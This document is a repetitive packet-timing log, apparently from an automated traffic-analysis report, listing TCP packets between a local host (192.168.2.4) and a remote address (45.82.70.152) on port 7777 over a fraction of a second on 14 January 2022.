                                                                                                                                  Jan 14, 2022 14:10:41.968504906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968539000 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968542099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968574047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968609095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968611002 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968643904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968677998 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968677998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968717098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968749046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968753099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968784094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968820095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968823910 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968852997 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968888998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968888998 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968924999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968960047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968962908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968995094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969027996 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969032049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969062090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969095945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969098091 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969129086 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969163895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969166994 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969197035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969232082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969233990 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969266891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969300032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969309092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969335079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969369888 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969383001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969403028 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969438076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969439983 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969472885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969507933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969511032 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969543934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969578981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969579935 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969613075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969647884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969651937 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969681025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969715118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969718933 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969748974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969784021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969786882 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969820023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969861031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969876051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969911098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969944954 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.969945908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.969980955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970016003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970016956 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.970052004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970086098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970088005 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.970120907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970155001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970155001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.970187902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970222950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970222950 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.970257998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.970304966 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982315063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982357979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982398987 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982414961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982439995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982480049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982516050 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982520103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982559919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982568026 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982618093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982659101 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982661009 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982697010 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982734919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982742071 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982774973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982812881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982821941 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982852936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982892990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982896090 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.982933998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982973099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.982978106 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983010054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983048916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983052015 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983088017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983124018 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983129978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983161926 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983200073 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983202934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983237982 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983278036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983279943 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983314037 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983352900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983355045 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983391047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983428955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983433008 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983468056 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983505011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983515978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983545065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983584881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983587980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983622074 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983659983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983663082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983699083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983735085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983743906 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983772993 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983810902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983814001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983849049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983887911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983891010 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.983926058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983963966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.983968973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984002113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984038115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984049082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984077930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984117031 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984122992 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984155893 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984194994 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984230995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984245062 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984270096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984302998 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984307051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984344006 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984354019 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.984384060 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.984431028 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995484114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995541096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995594978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995606899 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995632887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995672941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995682955 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995712042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995752096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995763063 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995790958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995829105 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995840073 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995867014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995906115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995914936 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.995943069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.995982885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996005058 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996021032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996059895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996071100 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996100903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996138096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996149063 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996176958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996216059 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996227026 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996253014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996292114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996304035 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996330023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996370077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996386051 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996419907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996460915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996470928 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996500969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996539116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996550083 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996578932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996617079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996628046 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996656895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996695042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996706963 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996737003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996773005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996798992 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996812105 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996855974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996860981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996892929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996931076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.996942043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.996970892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997009039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997020960 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997049093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997087002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997097969 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997126102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997164965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997174978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997200966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997240067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997250080 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997277975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997317076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997327089 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997354984 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997390985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997400999 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997430086 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997467995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997478008 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997504950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997544050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997555971 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997585058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997622013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997633934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997662067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997698069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997723103 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997736931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997775078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997786045 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997811079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997863054 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.997874022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997930050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997965097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.997977972 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998011112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998049974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998060942 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998086929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998125076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998135090 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998163939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998199940 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998214006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998238087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998275042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998285055 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998312950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998352051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998362064 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998387098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998425961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998435020 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998465061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998501062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998511076 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998539925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998580933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998585939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998620033 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998658895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998668909 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998696089 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998733997 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998739958 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998771906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998807907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998817921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998846054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998883009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998893023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998922110 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998960972 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.998970032 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.998996973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999033928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999039888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.999073029 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999109983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999119997 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.999147892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999188900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999217033 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.999229908 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999269009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999279022 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.999305964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999342918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.999353886 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:42.009638071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:42.009671926 CET77774977845.82.70.152192.168.2.4
